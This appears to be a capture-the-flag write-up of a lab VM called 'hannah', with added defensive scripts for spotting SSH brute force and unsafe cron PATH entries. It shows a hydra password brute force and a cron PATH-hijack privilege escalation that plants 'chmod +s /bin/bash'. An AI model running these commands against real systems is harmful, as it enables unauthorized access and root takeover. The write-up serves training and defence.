Hacking practice...

1. Scan the network segment

┌──(root㉿kali)-[/home/ace]
└─# arp-scan -l --interface=eth1
Interface: eth1, type: EN10MB, MAC: 00:0c:29:4d:2f:15, IPv4: 192.168.56.127
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0a (Unknown: locally administered)
192.168.56.100 08:00:27:28:10:c8 (Unknown)
192.168.56.134 08:00:27:7a:ae:cd (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.850 seconds (138.38 hosts/sec). 3 responded

2. Scan ports and services

┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV 192.168.56.134 -p0-65535
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 14:03 CST
Nmap scan report for 192.168.56.134
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 3072 5f1c78369905320982d3d5054c1475d1 (RSA)
| 256 0669ef979b34d7f3c79660d1a1ffd82c (ECDSA)
|_ 256 853dda74b2684ea6f7e5f58540902e9a (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/enlightenment
|_http-title: Site doesn't have a title (text/html).
|_auth-owners: moksha
|_http-server-header: nginx/1.18.0
113/tcp open ident?
|_auth-owners: root
MAC Address: 08:00:27:7A:AE:CD (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.61 seconds

3. Take a look at the web page

[Screenshot: home page of http://192.168.56.134/]

Nothing at all???

4. Scan directories

dirsearch is fairly fast, so let's try it:

┌──(root㉿kali)-[/home/ace]
└─# dirsearch -u http://192.168.56.134/

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.134/-_23-07-28_14-24-24.txt

Error Log: /root/.dirsearch/logs/errors-23-07-28_14-24-24.log

Target: http://192.168.56.134/

[14:24:24] Starting:
[14:24:50] 200 - 19B - /index.html
[14:25:02] 200 - 25B - /robots.txt

Task Completed

5. Visit robots.txt

[Screenshot: robots.txt, whose only entry disallows /enlightenment]

But at this point we have no other leads, so get ready to brute-force with hydra.

6. hydra brute force

The nmap output above (auth-owners: moksha on port 80) already shows that the user is moksha.

Give it a try:

┌──(root㉿kali)-[/home/ace]
└─# hydra ssh://192.168.56.134 -l moksha -P /usr/share/wordlists/rockyou.txt -f -v
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-28 14:36:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.134:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://moksha@192.168.56.134:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.134:22
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Disabled child 8 because of too many errors
[VERBOSE] Disabled child 15 because of too many errors
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Disabled child 9 because of too many errors
[VERBOSE] Disabled child 14 because of too many errors
[22][ssh] host: 192.168.56.134 login: moksha password: hannah
[STATUS] attack finished for 192.168.56.134 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-28 14:36:47
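From the defender's side, a run like this leaves an unmistakable trail in sshd's log: a burst of failed passwords from one source, then an accepted login from that same source. The script below is an added example, not part of the original writeup; its log lines are constructed to resemble what the target's /var/log/auth.log would record (addresses, PIDs and timestamps are made up), and it only assumes awk and sort.

```shell
#!/bin/sh
# Spot an SSH password brute force in sshd log lines: count failures per source
# and flag an accepted login from a source that had already failed repeatedly.
# Added example, not from the writeup. The log lines are constructed to resemble
# what a run like the one above leaves in /var/log/auth.log on the target.

SAMPLE_AUTH_LOG='Jul 28 14:36:29 hannah sshd[1201]: Failed password for moksha from 192.168.56.127 port 51012 ssh2
Jul 28 14:36:29 hannah sshd[1203]: Failed password for moksha from 192.168.56.127 port 51014 ssh2
Jul 28 14:36:30 hannah sshd[1205]: Failed password for invalid user admin from 192.168.56.127 port 51016 ssh2
Jul 28 14:36:30 hannah sshd[1207]: Failed password for moksha from 192.168.56.127 port 51018 ssh2
Jul 28 14:36:31 hannah sshd[1209]: Failed password for moksha from 192.168.56.127 port 51020 ssh2
Jul 28 14:36:40 hannah sshd[1211]: Accepted password for moksha from 192.168.56.127 port 51022 ssh2
Jul 28 14:40:02 hannah sshd[1300]: Failed password for moksha from 192.168.1.51 port 40000 ssh2
Jul 28 14:40:09 hannah sshd[1302]: Accepted password for moksha from 192.168.1.51 port 40002 ssh2'

# failed_by_source < log  ->  "count ip" per source, highest count first
failed_by_source() {
    awk '/sshd\[[0-9]+\]: Failed password/ {
             for (i = 1; i <= NF; i++) if ($i == "from") n[$(i + 1)]++
         }
         END { for (ip in n) print n[ip], ip }' | sort -rn
}

# brute_force_sources THRESHOLD < log  ->  sources with at least THRESHOLD failures
brute_force_sources() {
    failed_by_source | awk -v t="$1" '$1 >= t { print $2 }'
}

# success_after_failures < log  ->  "ip user" for each accepted login from a
# source that had already failed 3 or more times: the trail a brute force that
# found the password leaves (the hydra run above fails until it hits "hannah")
success_after_failures() {
    awk '/sshd\[[0-9]+\]: Failed password/ {
             for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i + 1)]++
         }
         /sshd\[[0-9]+\]: Accepted password/ {
             for (i = 1; i <= NF; i++) {
                 if ($i == "for")  user = $(i + 1)
                 if ($i == "from") ip = $(i + 1)
             }
             if (fails[ip] >= 3) print ip, user
         }'
}

printf '%s\n' "$SAMPLE_AUTH_LOG" | brute_force_sources 3     # 192.168.56.127
printf '%s\n' "$SAMPLE_AUTH_LOG" | success_after_failures    # 192.168.56.127 moksha
```

On a live system feed the functions with the real log (for example `grep sshd /var/log/auth.log | success_after_failures`); the 3-failure threshold is a tunable, not a standard.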

Connect:

┌──(root㉿kali)-[/home/ace]
└─# ssh moksha@192.168.56.134
The authenticity of host '192.168.56.134 (192.168.56.134)' can't be established.
ED25519 key fingerprint is SHA256:RZdWDCayN2ZJO5rXaVv2OOemeArZ0UbcRoKCoz9lWzA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.134' (ED25519) to the list of known hosts.
Load key "/root/.ssh/id_rsa": error in libcrypto
moksha@192.168.56.134's password:
Linux hannah 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 4 10:45:54 2023 from 192.168.1.51
moksha@hannah:~$

Connected successfully.

Got usr.txt.

7. sudo privilege escalation

moksha@hannah:~$ sudo l
-bash: sudo: orden no encontrada

sudo is not even installed, so look for SUID binaries instead:

moksha@hannah:~$ find / -type f -perm -4000 -ls 2>/dev/null
137350 52 -rwsr-xr-- 1 root messagebus 51336 oct 5 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
269176 472 -rwsr-xr-x 1 root root 481608 jul 2 2022 /usr/lib/openssh/ssh-keysign
3763 72 -rwsr-xr-x 1 root root 71912 ene 20 2022 /usr/bin/su
3604 44 -rwsr-xr-x 1 root root 44632 feb 7 2020 /usr/bin/newgrp
110 64 -rwsr-xr-x 1 root root 63960 feb 7 2020 /usr/bin/passwd
4132 36 -rwsr-xr-x 1 root root 35040 ene 20 2022 /usr/bin/umount
109 88 -rwsr-xr-x 1 root root 88304 feb 7 2020 /usr/bin/gpasswd
107 52 -rwsr-xr-x 1 root root 52880 feb 7 2020 /usr/bin/chsh
106 60 -rwsr-xr-x 1 root root 58416 feb 7 2020 /usr/bin/chfn
4130 56 -rwsr-xr-x 1 root root 55528 ene 20 2022 /usr/bin/mount

Nothing usable here.

Let's look at other directories.

moksha@hannah:/etc$ cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/media:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * root touch /tmp/enlIghtenment
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Line 19 of the listing (the job that runs touch /tmp/enlIghtenment as root every minute) is the hint: touch is called without an absolute path, so we can consider PATH hijacking.

moksha@hannah:/$ which touch
/usr/bin/touch
moksha@hannah:/$
moksha@hannah:/$ grep "PATH" /etc/crontab | tr -d "PATH=" | sed "s/:/\n/g" | xargs ls -ld
lrwxrwxrwx 1 root root 7 ene 4 2023 /bin -> usr/bin
drwxrwxrwx 3 root root 4096 ene 4 2023 /media
lrwxrwxrwx 1 root root 8 ene 4 2023 /sbin -> usr/sbin
drwxr-xr-x 2 root root 20480 ene 4 2023 /usr/bin
drwxr-xr-x 2 root root 4096 ene 4 2023 /usr/local/bin
drwxr-xr-x 2 root root 4096 ene 4 2023 /usr/local/sbin
drwxr-xr-x 2 root root 12288 ene 4 2023 /usr/sbin

/media is the target: it is world-writable (drwxrwxrwx) and comes before /bin and /usr/bin, where the real touch lives, in cron's PATH.

moksha@hannah:/$ echo "chmod +s /bin/bash" > /media/touch
moksha@hannah:/$ chmod +x /media/touch
moksha@hannah:/$ bash -p
moksha@hannah:/$ cd root
bash: cd: root: Permiso denegado
moksha@hannah:/$ bash -p
bash-5.1# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
bash-5.1# cd root
bash-5.1# ls
root.txt
bash-5.1# cat root.txt
HMVHAPPYNY2023
bash-5.1#
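The manual check of cron's PATH entries above (grep, tr, xargs ls -ld) generalises into an audit a defender can run against any crontab: every PATH directory that is group- or world-writable, not root-owned, or missing is a place where a file named after a cron command would be found ahead of /usr/bin. The script is an added example, not from the writeup; it assumes GNU coreutils (stat -c, readlink -f) as on the Debian target, and its demo builds a constructed replica of the box's layout in a temp dir rather than touching the real system.

```shell
#!/bin/sh
# Audit the PATH= line of a crontab and report directories an unprivileged
# user could write to, i.e. where a file named after a cron command (touch
# here) could be planted. Added example, not from the writeup; assumes GNU
# coreutils (stat -c, readlink -f) as on the Debian target.

# crontab_path FILE  ->  value of the first PATH= line (empty if none)
crontab_path() {
    sed -n 's/^PATH=//p' "$1" | head -n 1
}

# unsafe_path_dirs FILE  ->  "<dir> <reason>" for each PATH entry that is
# missing, group/other-writable, or not owned by root
unsafe_path_dirs() {
    crontab_path "$1" | tr ':' '\n' | while IFS= read -r dir; do
        [ -n "$dir" ] || continue
        if [ ! -d "$dir" ]; then
            printf '%s missing\n' "$dir"
            continue
        fi
        real=$(readlink -f "$dir")        # follow /bin -> usr/bin style links
        mode=$(stat -c '%a' "$real")
        owner=$(stat -c '%U' "$real")
        # 0$mode is the octal mode; 022 masks the group and other write bits
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            printf '%s writable(%s)\n' "$dir" "$mode"
        elif [ "$owner" != root ]; then
            printf '%s owner=%s\n' "$dir" "$owner"
        fi
    done
}

# demo_audit  ->  findings for a constructed replica of the box under a temp
# dir: same PATH order (local bin, media, bin -> usr/bin), media mode 777
demo_audit() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/usr/local/bin" "$tmp/usr/bin" "$tmp/media"
    chmod 755 "$tmp/usr" "$tmp/usr/local" "$tmp/usr/local/bin" "$tmp/usr/bin"
    chmod 777 "$tmp/media"                # the world-writable entry
    ln -s usr/bin "$tmp/bin"
    printf 'PATH=%s/usr/local/bin:%s/media:%s/bin\n* * * * * root touch /tmp/enlIghtenment\n' \
        "$tmp" "$tmp" "$tmp" > "$tmp/crontab"
    unsafe_path_dirs "$tmp/crontab" | sed "s|^$tmp||"   # drop the temp prefix
    rm -rf "$tmp"
}

demo_audit    # /media writable(777)  (plus owner= lines when not run as root)
```

Run `unsafe_path_dirs /etc/crontab` (and the files in /etc/cron.d) on a real host; the fix the finding points at is either removing the writable directory from cron's PATH or calling commands by absolute path.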

over.